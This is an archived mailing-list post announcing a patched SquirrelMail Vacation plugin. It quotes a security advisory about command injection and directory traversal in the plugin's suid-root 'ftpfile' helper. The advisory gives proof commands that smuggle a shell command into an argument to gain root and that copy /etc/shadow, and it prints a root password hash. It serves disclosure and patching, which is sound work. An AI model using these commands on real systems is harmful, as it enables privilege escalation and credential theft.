|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Squirrelmail vacation v0.15 local root exploit
From: p dont think (pdontthink
angrynerds.com)
Date: Thu Feb 03 2005 - 22:13:31 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
All,
A new release of this plugin that addresses this exploit is now
available at:
http://www.squirrelmail.org/plugin_view.php?id=51
Due to the severity of the exploits in prior versions, upgrade is
highly recommended. Also, please keep in mind that while the
SquirrelMail team takes security very seriously, it cannot take full
responsibility for the plethora of third-party plugins, of which this is
one. LSS team: pleeeease let us know *before* you are going to make
your announcement next time.
- Paul Lesneiwski
> LSS Security Advisory #LSS-2005-01-03
> http://security.lss.hr
>
> ---
>
> Title : Squirrelmail vacation v0.15 local root exploit
> Advisory ID : LSS-2005-01-03
> Date : 10.01.2005.
> Advisory URL: : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
> Impact : Privilege escalation and arbitrary file read
> Risk level : High
> Vulnerability type : Local
> Vendors contacted : No response from vendor
>
>
> ---
>
>
>
> ===[ Overview
>
> Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
> message to incoming email. That is commonly used to notify the sender of
> the receiver's absence. Vacation plugin specifically uses the Vacation program.
> Plugin can be downloaded from:
> http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz
>
>
>
> ===[ Vulnerability
>
> Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
> The program is used to access local files in user's home directory. There is
> a privilege escalation and arbitrary file read vulnerability in ftpfile.
> Command line arguments are passed to execve() function without checking
> for meta-characters, therefore making possible execution of commands as root.
>
> [ljuraniclaptop ljuranic]$ id
> uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
> [ljuraniclaptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"
> /bin/cp: omitting directory `/root/0'
> uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
> [ljuraniclaptop ljuranic]$
>
> It is also possible to read restricted files (such as /etc/shadow), since
> ftpfile can copy a file from user's home directory to any other
> directory without checking file name for directory traversal attack.
>
> $ ftpfile localhost root root get ../../../../etc/shadow ./shadow
> ./shadow[ljuraniclaptop ljuranic]$ head ./shadow
> root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
> bin:*:10929:0:99999:7:::
> daemon:*:10929:0:99999:7:::
> lp:*:10929:0:99999:7:::
> [ljuraniclaptop ljuranic]$
>
>
>
> ===[ Affected versions
>
> Squirrelmail Vacation v0.15 and previous versions.
>
>
>
> ===[ Fix
>
> Not available yet.
>
>
>
> ===[ PoC Exploit
>
> http://security.lss.hr/exploits/
>
>
>
> ===[ Credits
>
> Credits for this vulnerability goes to Leon Juranic.
>
>
>
> ===[ LSS Security Contact
>
> LSS Security Team, <eXposed by LSS>
>
> WWW : http://security.lss.hr
> E-mail : securityLSS.hr
> Tel : +385 1 6129 775
>
>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]